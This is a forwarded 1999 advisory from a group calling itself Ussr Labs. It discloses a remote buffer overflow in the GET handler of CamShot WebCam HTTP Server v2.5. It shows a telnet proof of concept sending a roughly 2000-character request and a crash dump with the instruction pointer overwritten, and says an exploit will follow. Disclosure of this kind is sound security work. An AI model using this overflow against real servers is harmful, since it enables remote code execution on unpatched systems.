---------- Forwarded message ---------- From: "Ussr Labs" To: "TECHNOTRONIC" Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebC= am HTTP Server v2.5 for Win9x/NT Date: Thu, 30 Dec 1999 14:04:14 -0300 Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT USSR Advisory Code: USSR-99028 Release Date: December 30, 1999 [4/5] Systems Affected: CamShot WebCam HTTP Server v2.5 for Win9x and possibly others versions. About The Software: CamShot is a Windows 95/98/NT web server that serves up web pages contain= ing time stamped images captured from a video camera. The images can be viewed fro= m anywhere on the network with a web browser. CamShot works with =91Video For Window= s compatible video equipment. Finally a cheap and simple way to do remote surveillance= is here!. THE PROBLEM UssrLabs found a Local / Remote Buffer overflow, The code that handles GE= T commands has an unchecked buffer that will allow arbitrary code to be executed if = it is overflowed. Do you do the w00w00? This advisory also acts as part of w00giving. This is another contributio= n to w00giving for all you w00nderful people out there. You do know what w00giving is don't you? http://www.w00w00.org/advisories.html Example [hell@imahacker]$ telnet die.communitech.net 80 Trying example.com... Connected to die.communitech.net Escape character is '^]'. GET (buffer) HTTP/1.1 Where [buffer] is aprox. 2000 characters. At his point the server overflo= ws. And in remote machine someone will be see something like this. CAMSHOT caused an invalid page fault in module at 0000:61616161. Registers: EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246 EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058 ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000 Bytes at CS:EIP: Stack dump: bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74 005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8 Binary or source for this Exploit (wen we finish it): http://www.ussrback.com/ Vendor Status: Informed. Vendor Url: http://www.broadgun.com/arcit/index.html Program Url: http://broadgun.com/Camshot.htm Credit: USSRLABS SOLUTION Noting yet. Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic an= d Wiretrip. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com